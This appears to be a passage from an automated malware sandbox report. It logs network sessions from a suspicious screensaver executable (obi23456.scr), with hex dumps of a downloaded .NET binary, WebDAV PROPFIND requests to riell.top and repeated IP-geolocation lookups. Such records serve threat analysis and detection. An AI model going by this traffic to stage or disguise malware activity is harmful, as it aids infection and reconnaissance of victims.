                    Data Ascii: ot*r(,(((*{L*"}L*{M*"}M*{N*"}N*V(,((*j(,s((*j(,s((*"}a*{b*"}b*:(i}e*V(i}e}d*(i}e}d(
                    2024-07-04 19:38:37 UTC1369INData Raw: 02 7b 80 00 00 04 2a 22 02 03 7d 80 00 00 04 2a 56 02 28 2c 01 00 06 02 03 28 41 01 00 06 02 04 28 43 01 00 06 2a 1e 02 7b 82 00 00 04 2a 22 02 03 7d 82 00 00 04 2a 42 02 7b 81 00 00 04 25 2d 06 26 7e 7c 00 00 0a 2a 22 02 03 7d 81 00 00 04 2a 3a 02 28 29 02 00 06 02 03 28 47 01 00 06 2a 1e 02 7b 83 00 00 04 2a 6e 03 28 67 00 00 0a 2c 0b 72 f7 0b 00 70 73 7f 00 00 0a 7a 02 03 7d 83 00 00 04 2a 6a 02 28 2c 01 00 06 02 03 28 4b 01 00 06 02 28 4c 01 00 06 04 6f 33 01 00 06 2a 1e 02 7b 85 00 00 04 2a 22 02 03 7d 85 00 00 04 2a 4a 02 73 2a 02 00 06 7d 89 00 00 04 02 28 29 02 00 06 2a d2 02 73 2a 02 00 06 7d 89 00 00 04 02 28 29 02 00 06 02 03 28 50 01 00 06 02 04 28 52 01 00 06 02 05 28 54 01 00 06 02 28 55 01 00 06 0e 04 6f 31 02 00 06 2a 1e 02 7b 86 00 00 04
                    Data Ascii: {*"}*V(,(A(C*{*"}*B{%-&~|*"}*:()(G*{*n(g,rpsz}*j(,(K(Lo3*{*"}*Js*}()*s*}()(P(R(T(Uo1*{
                    2024-07-04 19:38:37 UTC1369INData Raw: 7b b8 00 00 04 25 2d 03 26 2b 0b 02 7e 86 00 00 0a 6f 87 00 00 0a 02 7b b0 00 00 04 2a 42 02 7b af 00 00 04 25 2d 06 26 7e 7c 00 00 0a 2a 22 02 03 7d af 00 00 04 2a da 02 7b b3 00 00 04 18 5f 2d 25 02 02 7b b3 00 00 04 18 60 7d b3 00 00 04 02 7b b7 00 00 04 25 2d 03 26 2b 0b 02 7e 86 00 00 0a 6f 87 00 00 0a 02 7b b1 00 00 04 2a 3a 02 28 7d 00 00 0a 02 03 28 b4 01 00 06 2a 3a 02 28 7d 00 00 0a 02 03 28 b3 01 00 06 2a 4a 02 28 7e 00 00 0a 03 6f 03 00 00 0a 74 3b 00 00 02 2a 3a 02 28 d9 01 00 06 02 03 28 bf 01 00 06 2a 1e 02 7b bb 00 00 04 2a 22 02 03 7d bb 00 00 04 2a 42 02 7b ba 00 00 04 25 2d 06 26 7e 7c 00 00 0a 2a 22 02 03 7d ba 00 00 04 2a 4a 02 7b bc 00 00 04 03 6f 89 00 00 0a 74 3d 00 00 02 2a 52 02 7b bc 00 00 04 03 04 6f 8a 00 00 0a 02 28 c8 01 00
                    Data Ascii: {%-&+~o{*B{%-&~|*"}*{_-%{`}{%-&+~o{*:(}(*:(}(*J(~ot;*:((*{*"}*B{%-&~|*"}*J{ot=*R{o(
                    2024-07-04 19:38:37 UTC1369INData Raw: 00 00 04 2a 22 02 03 7d d7 00 00 04 2a 3a 02 28 7d 00 00 0a 02 03 28 32 02 00 06 2a 3a 02 28 7d 00 00 0a 02 03 28 31 02 00 06 2a 4a 02 28 7e 00 00 0a 03 6f 03 00 00 0a 74 4d 00 00 02 2a 36 02 03 73 3b 01 00 06 28 2f 02 00 06 2a 3a 02 28 29 02 00 06 02 03 28 3c 02 00 06 2a 1e 02 7b d8 00 00 04 2a 22 02 03 7d d8 00 00 04 2a a2 02 73 2a 02 00 06 7d d9 00 00 04 02 73 c0 00 00 06 7d da 00 00 04 02 73 2a 02 00 06 7d db 00 00 04 02 28 29 02 00 06 2a 1e 02 7b d9 00 00 04 2a 1e 02 7b da 00 00 04 2a 1e 02 7b db 00 00 04 2a 4a 02 28 80 01 00 06 02 72 0f 0c 00 70 28 6c 02 00 06 2a 92 02 73 b8 02 00 06 7d dc 00 00 04 02 73 77 02 00 06 7d dd 00 00 04 02 17 7d e6 00 00 04 02 28 76 02 00 06 2a ae 02 73 b8 02 00 06 7d dc 00 00 04 02 73 77 02 00 06 7d dd 00 00 04 02 17 7d
                    Data Ascii: *"}*:(}(2*:(}(1*J(~otM*6s;(/*:()(<*{*"}*s*}s}s*}()*{*{*{*J(rp(l*s}sw}}(v*s}sw}}
                    2024-07-04 19:38:37 UTC1369INData Raw: 28 7e 00 00 0a 03 6f 03 00 00 0a 74 5c 00 00 02 2a 3a 02 03 73 a4 02 00 06 28 bd 02 00 06 26 2a 3a 02 03 73 a1 02 00 06 28 bd 02 00 06 26 2a 3a 02 28 2c 01 00 06 02 03 28 cc 02 00 06 2a 4e 02 28 2c 01 00 06 02 03 73 a4 02 00 06 28 cc 02 00 06 2a 4e 02 28 2c 01 00 06 02 03 73 a1 02 00 06 28 cc 02 00 06 2a 22 02 03 7d 00 01 00 04 2a 56 02 28 29 02 00 06 02 03 28 d9 02 00 06 02 04 28 d7 02 00 06 2a 6a 02 28 29 02 00 06 02 03 73 a4 02 00 06 28 d9 02 00 06 02 04 28 d7 02 00 06 2a 6a 02 28 29 02 00 06 02 03 73 a1 02 00 06 28 d9 02 00 06 02 04 28 d7 02 00 06 2a 72 02 28 29 02 00 06 02 03 28 d9 02 00 06 02 04 28 d7 02 00 06 02 05 28 d5 02 00 06 2a 86 02 28 29 02 00 06 02 03 73 a4 02 00 06 28 d9 02 00 06 02 04 28 d7 02 00 06 02 05 28 d5 02 00 06 2a 86 02 28 29 02
                    Data Ascii: (~ot\*:s(&*:s(&*:(,(*N(,s(*N(,s(*"}*V()((*j()s((*j()s((*r()(((*()s(((*()
                    2024-07-04 19:38:37 UTC1369INData Raw: 03 00 06 02 03 6f 13 01 00 06 28 3c 03 00 06 2a 76 02 28 26 03 00 06 0f 01 72 15 0f 00 70 28 e8 00 00 0a 28 ed 00 00 0a 6f ce 00 00 0a 2a 76 02 28 26 03 00 06 0f 01 72 15 0f 00 70 28 e8 00 00 0a 28 ee 00 00 0a 6f ce 00 00 0a 2a 62 02 28 26 03 00 06 0f 01 28 e8 00 00 0a 28 ef 00 00 0a 6f ce 00 00 0a 2a 6e 03 2d 0b 72 5d 0d 00 70 73 7f 00 00 0a 7a 02 03 6f cb 02 00 06 6f 4e 03 00 06 2a e2 03 2d 0b 72 5d 0d 00 70 73 7f 00 00 0a 7a 02 28 26 03 00 06 72 19 0f 00 70 6f ce 00 00 0a 02 03 6f 88 02 00 06 6f 4e 03 00 06 02 28 26 03 00 06 1f 29 6f e7 00 00 0a 2a f6 03 2d 0b 72 5d 0d 00 70 73 7f 00 00 0a 7a 03 6f e0 00 00 06 2d 1a 28 40 00 00 06 72 5d 0d 00 70 28 32 00 00 06 72 5d 0d 00 70 73 e5 00 00 0a 7a 02 03 6f e0 00 00 06 6f 78 03 00 06 2a 82 03 2d 0b 72 5d 0d
                    Data Ascii: o(<*v(&rp((o*v(&rp((o*b(&((o*n-r]pszooN*-r]psz(&rpoooN(&)o*-r]pszo-(@r]p(2r]pszoox*-r]
                    2024-07-04 19:38:37 UTC1369INData Raw: 00 06 03 72 37 10 00 70 03 6f 99 01 00 06 28 dc 03 00 06 03 6f 9b 01 00 06 28 d9 03 00 06 2a 9a 03 6f 28 01 00 06 2c 0c 02 03 6f 28 01 00 06 28 dd 03 00 06 03 72 97 10 00 70 03 6f 2a 01 00 06 28 dc 03 00 06 2a 86 03 6f 0e 01 00 06 2c 0c 02 03 6f 0e 01 00 06 28 dd 03 00 06 02 03 6f 10 01 00 06 28 d7 03 00 06 2a 62 03 6f df 01 00 06 28 d8 03 00 06 02 03 6f e1 01 00 06 28 d7 03 00 06 2a de 03 6f e6 01 00 06 6f 80 00 00 0a 16 31 0c 02 03 6f e6 01 00 06 28 b9 03 00 06 03 6f ea 01 00 06 28 d8 03 00 06 03 72 dd 0f 00 70 03 6f ec 01 00 06 28 dc 03 00 06 2a 36 02 03 6f 13 01 00 06 28 dd 03 00 06 2a 9a 03 6f 01 02 00 06 2c 0c 02 03 6f 01 02 00 06 28 dd 03 00 06 03 72 ab 10 00 70 03 6f 03 02 00 06 28 dc 03 00 06 2a 32 02 6f 88 02 00 06 28 d8 03 00 06 2a be 02 6f cf
                    Data Ascii: r7po(o(*o(,o((rpo*(*o,o(o(*bo(o(*oo1o(o(rpo(*6o(*o,o(rpo(*2o(*o
                    2024-07-04 19:38:37 UTC1369INData Raw: 28 17 01 00 0a 02 04 7d 65 01 00 04 2a 1e 02 7b 65 01 00 04 2a 56 02 28 69 00 00 0a 02 03 7d 66 01 00 04 02 04 7d 67 01 00 04 2a 26 02 14 16 28 72 04 00 06 2a 26 02 03 16 28 72 04 00 06 2a 96 02 28 69 00 00 0a 02 04 28 86 04 00 06 02 03 7d 6d 01 00 04 02 28 9b 00 00 0a 73 1a 01 00 0a 7d 6e 01 00 04 2a 3a 02 17 6f 74 04 00 06 02 28 1b 01 00 0a 2a 1e 02 28 8a 04 00 06 2a 3a 02 03 02 28 85 04 00 06 28 77 04 00 06 2a 46 02 7b 6e 01 00 04 6f 1e 01 00 0a 6f 09 00 00 0a 2a 4e 02 7b 6e 01 00 04 6f 1e 01 00 0a 03 04 6f 08 00 00 0a 2a 32 02 7b 6e 01 00 04 6f 1f 01 00 0a 2a 42 02 7b 6d 01 00 04 25 2d 06 26 7e 7c 00 00 0a 2a 36 02 28 83 04 00 06 02 7b 6c 01 00 04 2a 4e 02 17 7d 6f 01 00 04 14 28 24 01 00 0a 6f 25 01 00 0a 2a 1e 02 7b 70 01 00 04 2a 22 02 03 7d 70 01
                    Data Ascii: (}e*{e*V(i}f}g*&(r*&(r*(i(}m(s}n*:ot(*(*:((w*F{noo*N{noo*2{no*B{m%-&~|*6({l*N}o($o%*{p*"}p


                    Session IDSource IPSource PortDestination IPDestination Port
                    8192.168.2.2249170188.114.97.3443
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:40 UTC156OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 72 69 65 6c 6c 2e 74 6f 70 0d 0a 0d 0a
                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: riell.top
                    2024-07-04 19:38:41 UTC722INHTTP/1.1 405 Method Not Allowed
                    Date: Thu, 04 Jul 2024 19:38:41 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    Allow: POST,OPTIONS,HEAD,GET,TRACE
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RQTL%2BzcIfFHCXW11lUqSdofMRW4QiTXKWld4pRBlS85HrGFflDRZhYADmKKtQxwkwkIuGpmMRfTxidy%2BZYNXHeh%2FJdXkxLlccdwsGSFgvWFeNb5KJC6JgZdpKDE%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                    X-Content-Type-Options: nosniff
                    Server: cloudflare
                    CF-RAY: 89e193b4fc255e80-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:41 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                    Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                    2024-07-04 19:38:41 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.2249171188.114.96.34433532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:40 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-04 19:38:41 UTC706INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:40 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 35746
                    Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eJA9npLRSYFymhpOy3D5n8dvYCinjpEL6EM4wyY5fV%2BFGR90HDqvJCthfZDPdHO8aOhnhQDHf5mjQ%2BnhbZfp7uBemzEXSjruyZa%2FnioxlDcBvFdVznpwyBNZPELW5az6D0u8Ywmu"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89e193b58ccf0f63-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:41 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-04 19:38:41 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.2249172188.114.96.34433532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:42 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    2024-07-04 19:38:42 UTC712INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:42 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 35748
                    Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SaRRQVbQvB7V2BKh7R8Tt6W%2FlKn%2B%2BSzRgBxkXRoByA2JumtFzk8JBWUnK%2B9M3Muc%2BUyChRjV52XGxHISFnUKxexpfZgxQHBDrsoWQACRPLqPXOoy5cACj8%2FXHFQZF13mrff3iqs3"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89e193bd38028c41-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:42 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-04 19:38:42 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination Port
                    11192.168.2.2249173188.114.96.3443
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:42 UTC156OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 72 69 65 6c 6c 2e 74 6f 70 0d 0a 0d 0a
                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: riell.top
                    2024-07-04 19:38:42 UTC720INHTTP/1.1 405 Method Not Allowed
                    Date: Thu, 04 Jul 2024 19:38:42 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    Allow: POST,OPTIONS,HEAD,GET,TRACE
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRTfIKrZfPfALZBUmaUGbZnfOZhdl2fyXrh5ZeV1MR04FTRQUNk41kNYXuwSeq%2FoBqxAbQX1LNVmqevlvoMDYDIwbg6u%2ByMy7b3IZoXKiTbJtJo5XASwub3TXn4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                    X-Content-Type-Options: nosniff
                    Server: cloudflare
                    CF-RAY: 89e193bef82342b7-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:42 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                    Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                    2024-07-04 19:38:42 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.2249175188.114.96.34433532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:43 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-04 19:38:44 UTC708INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:44 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 35750
                    Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtS5R4QU7fuV%2BzcSP4tZUO8mQQtXFPudYnrwjirArvdBwMZ9N26K94qWQJL5i8FoIw9P1bgruSBcUSOZ3w5ynw%2FbHBYs90REMHgMdqz1RmkhIFWBg%2FA410vWq0ajk7q%2FqvU8DJKE"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89e193c8f86872b3-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:44 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-04 19:38:44 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.2249177188.114.96.34433532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:46 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-04 19:38:46 UTC710INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:46 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 35752
                    Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bSFMbYXKhhwJQKrMO165tsvH1mvc8xcvVILGOYOM411sdyjNg0P%2FnXhb4mvriefVoxMYYeoGm%2BZ%2FwL8ag3zCT%2FkkyTsQ6J%2B9W0dwHYdiFvYlp2z8PghZ9ASpBbl5OBlclUjenPeK"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89e193d81a824271-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:46 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-04 19:38:46 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.2249179188.114.97.34433532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:47 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-04 19:38:48 UTC706INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:48 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 35754
                    Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
